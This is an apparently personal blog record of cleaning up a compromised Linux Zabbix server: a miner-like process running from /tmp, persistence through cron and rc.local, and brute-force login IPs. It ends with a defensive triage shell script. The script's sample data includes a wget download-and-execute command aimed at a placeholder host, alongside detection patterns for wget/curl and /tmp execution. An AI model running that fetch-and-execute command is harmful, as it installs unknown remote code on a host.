Today, when logging in to the Zabbix monitoring web page, it was extremely sluggish. After logging in to the system and running top, CPU usage was at 100%, taken up by a process called httpds. My first reaction was that the system had been compromised. The handling process is recorded below, for reference only.
Running top showed CPU consumption at 100%, all from the httpds process. The normal Apache process should be httpd, so this process looked abnormal.
Checking with ps -ef | grep httpds showed that the executable was under /tmp, which is certainly not normal. I decided to delete the httpds file and the process and look again.
After the deletion the CPU usage was still very high, indicating that other processes were still running in the background.
Looking at that process with ps, its executable was also in the /tmp directory, but /tmp no longer contained the file, which was rather strange. (A running process keeps its loaded image after the file on disk is unlinked, so ps still shows the original path.)
Setting that file aside for the moment, I first checked the scheduled tasks; there had to be a scheduled task responsible for launching these programs.
crontab -e showed no scheduled tasks.
Looking in /var/spool/cron
There was a zabbix entry here; I opened it to look.
This was not a Zabbix task, so I deleted the file without hesitation.
After deleting these files I killed the processes with kill, and found that the CPU was still occupied.
Having checked the scheduled tasks, I then checked the boot entries.
vim /etc/rc.local
Why would a program named x start at boot? This was definitely a problem, so I went to /tmp to see what x was.
Found the culprit: this program is what starts the httpds service. So where did this program come from? Unsurprisingly, I decided to look through the system for abnormal processes.
Viewing the active processes with top
Why was there an sh process? I had not executed any script. I used ps to see what this sh was doing.
This sh process downloads a script named x from a website, gives it 777 permissions and then executes it. So this is where the x script came from: it was downloaded. Then who initiated this command?
Since the x program was in the /tmp directory, I went to /tmp to look.
There were many programs there; I opened them to look.
The cmd.n program contained this.
It is the command that starts sh; presumably this was the thing triggered first.
Then I used ps -ef to check all processes for anything else abnormal, and found one more strange one.
Normally Samba's process should be nmbd, so why was there an nmb program? I checked the process.
It really was not a normal program; it was another executable under /tmp, and opening it showed binary content of unknown purpose. Regardless, I deleted it first and then killed the process.
To be safe, I removed all files under /tmp. No other abnormal programs were found, so the handling ended here.
The server must have a vulnerability that allowed the system to be compromised, so I checked the system log
/var/log/secure
Many abnormal logins were found:
163.172.190.5, a UK address, tried logging in with a variety of user names
91.197.232.103, a Russian address, tried logging in with a variety of user names
51.15.134.37, a French address, tried logging in with a variety of user names
193.70.122.217, an Italian address, tried logging in with a variety of user names
221.194.47.249, a Baoding, Hebei address, tried logging in with a variety of user names
But the logs from before the time of the problem had been deleted, so there was no way to find out how the system was broken into. This will have to be investigated gradually later.
To summarize, the handling process for this server intrusion is as follows:
1. Use which to check whether system commands have been altered: which ls; which cd; which ps and so on, to avoid relying on a modified command.
2. Check for abnormal processes: use top to see whether anything is consuming high CPU, and ps -ef to see whether there are processes with strange names.
3. Check scheduled tasks: the /var/spool/cron directory and crontab -e, for any abnormal scheduled tasks.
4. Check boot entries: vim /etc/rc.local to see whether anything abnormal is started at boot.
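The four checks above as one POSIX shell triage script. This is an added example, not part of the original post; the ps, cron and rc.local samples inside it are constructed to mirror this incident (httpds and nmb running from /tmp, an sh stager, a bogus entry in the zabbix crontab, an x launched from rc.local), and the download host in the sample is a placeholder.

```shell
#!/bin/sh
# Triage helpers for the four-step checklist above. Added example, not part of
# the original post; the ps, cron and rc.local samples are constructed to mirror
# the incident. Each check reads stdin, so it runs on captured output offline
# and on a live host via triage_live.
# No legitimate daemon should execute from a world-writable scratch directory.
SCRATCH='(/tmp|/var/tmp|/dev/shm)/'

# Step 1: "name path" pairs from command -v. An external command that does not
# resolve under /bin, /sbin, /usr/bin or /usr/sbin has been shadowed. In-place
# tampering of the binary itself needs rpm -Vf PATH or dpkg -V PKG instead.
check_commands() {
    awk '$2 !~ /^\/(usr\/)?s?bin\/[^\/]+$/ { print "ALTERED", $1, $2 }'
}

# Step 2: "pid pcpu args" lines from ps -eo pid=,pcpu=,args=. Flags anything
# running from or referencing a scratch directory, and anything above 80% CPU.
check_processes() {
    awk -v scratch="$SCRATCH" '
        $0 ~ scratch  { print "SCRATCH", $1, $3 }
        $2 + 0 >= 80  { print "HIGHCPU", $1, $2, $3 }'
}

# Steps 3 and 4: crontab or rc.local lines. Flags entries that run from a
# scratch directory or fetch a payload with wget/curl; comments are skipped.
check_autostart() {
    awk -v scratch="$SCRATCH" -v tag="$1" '
        /^[ \t]*(#|$)/ { next }
        $0 ~ scratch || $0 ~ /(^|[^A-Za-z0-9_])(wget|curl)[ \t]/ { print tag, $0 }'
}

# Constructed samples; the download host is a placeholder, not a real indicator.
SAMPLE_PS='1234 99.8 /tmp/httpds
1240 97.5 /tmp/nmb
1251 0.2 sh -c wget -q http://HOST-PLACEHOLDER/x -O /tmp/x;chmod 777 /tmp/x;/tmp/x
1302 0.5 /usr/sbin/httpd -DFOREGROUND'
SAMPLE_CRON='# /var/spool/cron/zabbix (constructed)
*/3 * * * * /tmp/cmd.n >/dev/null 2>&1'
SAMPLE_RC='#!/bin/sh
touch /var/lock/subsys/local
/tmp/x &'

# Run every check against the live host (needs root for /var/spool/cron): sh triage.sh --live
triage_live() {
    for c in ls ps netstat; do printf '%s %s\n' "$c" "$(command -v "$c" || echo MISSING)"; done | check_commands
    ps -eo pid=,pcpu=,args= | check_processes
    cat /var/spool/cron/* /etc/crontab 2>/dev/null | check_autostart CRON
    cat /etc/rc.local 2>/dev/null | check_autostart RCLOCAL
}
if [ "${1:-}" = "--live" ]; then triage_live; fi
```

Findings are one line each (SCRATCH, HIGHCPU, ALTERED, CRON, RCLOCAL) and need manual review; a legitimate service that merely mentions /tmp on its command line will also be listed.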
[Linux] Recording the handling of a system attack